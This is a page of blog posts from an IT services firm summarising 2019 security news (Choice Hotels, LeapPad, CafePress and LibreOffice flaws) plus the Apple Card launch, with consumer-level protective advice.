Tag Archives: Branding

Posted on Author Atlantic Computer Services Categories Blog

Choice Hotel Data Breach Affects up To 700,000 Customers

Recently, an independent researcher named Bob Diachenko worked collaboratively with Comparitech. They discovered an unsecured database containing nearly 700,000 hotel records belonging to Choice Hotels.  Unfortunately, although Diachenko reported his finding to the company, hackers had beaten him to the punch and had already downloaded the file. They are now demanding a ransom for its return.

An investigation into the matter is ongoing. A spokesman for Choice Hotels reported that the bulk of the file consisted of test information, including dummy payment card numbers, passwords and populated reservation fields.  They did confirm, however, the presence of some 700,000 genuine guest records and included names, addresses and phone numbers.

The hackers left a ransom note in the database, demanding 0.4 Bitcoin for the safe return of the data.  Based on recent prices, that amounts to about $4,000. Assuming the company decides to pay and assuming the hackers keep their word, that is a small price to pay given the number of compromised records.

Choice Hotels reported that the database was exposed when a third-party vendor accessed it as part of a proposal to provide a tool.  Due to the lapse in security, Choice Hotels has decided not to work with that vendor again.

Their announcement about the incident reads, in part, as follows:

“We are evaluating other vendor relationships and working to put additional controls in place to prevent any future occurrences of this nature… We are also establishing a Responsible Disclosure Program and we welcome Mr. Diachenko’s assistance in helping us identify any gaps.”

This lukewarm response to the incident has done little to ease the concerns of Choice Hotels’ customers. To this point, no notifications have been sent out to customers whose data has been compromised.  If you stay at Choice Hotels when you travel, be mindful that you may be receiving targeted phishing emails and that your payment card information may have been compromised.

0
Posted on Author Atlantic Computer Services Categories Blog

LeapPad Kids Tablet Found To Have Security Issues

Researchers at CheckMarx recently discovered some serious security flaws in the popular LeapPad Ultimate tablet.

The tablet was designed by LeapFrog to provide kids in the UK and Europe with a safe environment to access games, videos and educational apps.

 

The researchers had this to say about their discovery:

“The first thing we found is that some of LeapFrog’s communications aren’t encrypted.  It’s using very simple HTTP protocol, storing information in clear text and allowing an attacker to become a man-in-the-middle.”

The researchers built a proof of concept app that allowed them to spoof the existing connection and force the device onto a rogue network.  From there, they were able to inject malicious scripts into the rogue network and use them to access a variety of sensitive information from the system, such as the child’s name, gender, birth year and birth month.

The researchers also noted that this attack methodology could allow hackers to steal information about the parents of the kids using the device, including their email addresses, phone numbers and access to payment card information.

Mari Sunderland, the VP of Digital Product Management at LeapFrog, issued a formal statement for the company, which read, in part, as follows:

“We thank CheckMarx for bringing these security issues to our attention, as the safety of the children who use our products is our top priority. When you know that the main users of your device will be children, the standards you need to put on your R&D need to be the highest:  Military grade.  Vendors should be very responsible and understand that privacy issues for children are much worse.  All this needs to be taken into account to make sure your solution is as safe as possible.”

It’s a wonderful sentiment, and one hopes that LeapFrog’s next solution will be more robust.

0
Posted on Author Atlantic Computer Services Categories Blog

CafePress Users Are Latest To Have Information Breached

Hardly a week goes by that we don’t see another major data breach making the headlines.

The latest company to fall victim to hackers is CafePress.

They are well-known on the internet for offering a platform where users can create their own customized coffee mugs, tee shirts and the like.

The company didn’t make a formal announcement about the breach, and users only became aware of it when they started getting notifications from Troy Hunt’s “Have I Been Pwned” service. Once word started leaking out, Hunt joined forces with security researcher Jim Scott, who had worked with Hunt in the past tracking down other data breaches.

Working together, they discovered a de-hashed CafePress database containing nearly half a million accounts was being sold on black hat forums.  The researchers could not confirm, however, if these records were related to the most recent breach, or some previous one.

In any case, as they probed more deeply, they discovered that the company was actually hacked back in February of this year (2019), and that it was a significant breach. That breach exposed more than 23 million user records.  Based on their findings, the hack exposed email addresses, names, passwords, phone numbers and physical locations.

To date, CafePress has not made a formal announcement about the matter, nor acknowledged the breach in any way. Although if you are a CafePress user, you will be forced to reset your password the next time you log on.

While that’s a good step, it’s completely at odds with the company’s clumsy handling of the issue.  Password resets are not breach disclosures and notifications, and shouldn’t be treated as such.  File this away as an example of how not to handle a breach if your company is hacked.

0
Posted on Author Atlantic Computer Services Categories Blog

Apple Is Launching Their Own Credit Card Soon

Apple has partnered with Goldman Sachs and their long-awaited “Apple Card” begins rolling out in limited fashion. The card becomes available to all iPhone owners in the United States toward the end of August.

According to CEO Tim Cook, a random selection of people who signed up to be notified about the Apple Card are getting an early-access sneak peek.

However, the company has been tight-lipped about exactly how many people are being invited into the preview group.

If you’re one of the lucky winners, know that the sign-up process will involve upgrading to iOS 12.4 and entering your address, your birthday, income level and the last four digits of your Social Security number.  That information is sent on to Goldman Sachs, which will approve or deny your credit application in real time and in under a minute.

Note that part of the approval process also involves a TransUnion credit check, so if you have that information locked, you’ll need to unlock it (at least long enough to get approval).

Once you’ve been approved, your card will show up in your Apple Wallet immediately and be available for use.  If you want one, you can request a physical card from Apple for free during the setup and it will arrive in the mail in a few days.

The cool thing about the physical card is the fact that it has an NFC tag on it, so you can activate it simply by tapping the phone against it.

Also note that you’ll have three different credit card numbers associated with your Apple Card:

  • The number assigned to your phone
  • The number assigned to the physical card
  • A virtual number you can access in the app for online purchases where the vendor doesn’t accept Apple Pay.

Also note that unlike the other credit cards in your wallet, this one has no expiration date or security code. You can lock the card at any time from the app, though.  Welcome to Apple’s Brave New World!

0
Posted on Author Atlantic Computer Services Categories Blog

Security Flaw Found In Open Source Office Program LibreOffice

Do you use LibreOffice? It’s an open source clone that’s functionally similar to Microsoft Office that has grown quite popular over the years. It is available for Windows, macOS and Linux systems.

While open-source software solutions generally have the reputation of being safer and more secure, they’re not immune to vulnerabilities.

Recently, a pair of serious un-patched code execution vulnerability has been discovered that could result in malware being installed on your system if you’re not careful. In order to take advantage of the flaw, a hacker would need to create a special “poisoned” LibreOffice document and use social engineering tricks to convince you to open it.

While the company behind LibreOffice moved quickly to patch their software, independent security researcher Alex Infuhr has reported that the patch only corrected one of the two issues.  In addition, he was able to find a way around the company’s fix for the second.

The first vulnerability resides in LibreLogo, which is a programmable vector graphics script that ships by default with LibreOffice.  It allows users to specify pre-installed scripts in a document that can be executed on various events, such as a click or even a mouse hover.

The second issue could allow the inclusion of remote, arbitrary content within a document, even when “Stealth Mode” is enabled.  Note, however, that stealth mode is not enabled by default, but users can activate it to instruct documents to retrieve remote resources only from trusted locations. This is the issue that LibreOffice tried to fix but Infuhr found a way around.

If you want to protect your system from this issue, the best thing you can do would be to manually disable the LibreLogo component by opening the setup to begin the installation, then:

  • Select “Custom” installation
  • Expand “Optional Components”
  • Click on “LibreLogo” and select “This Feature Will Not Be Available.”
  • Then click “Next” and install the software.

That should take care of it!

 

0
1 5 6 7 8 9 13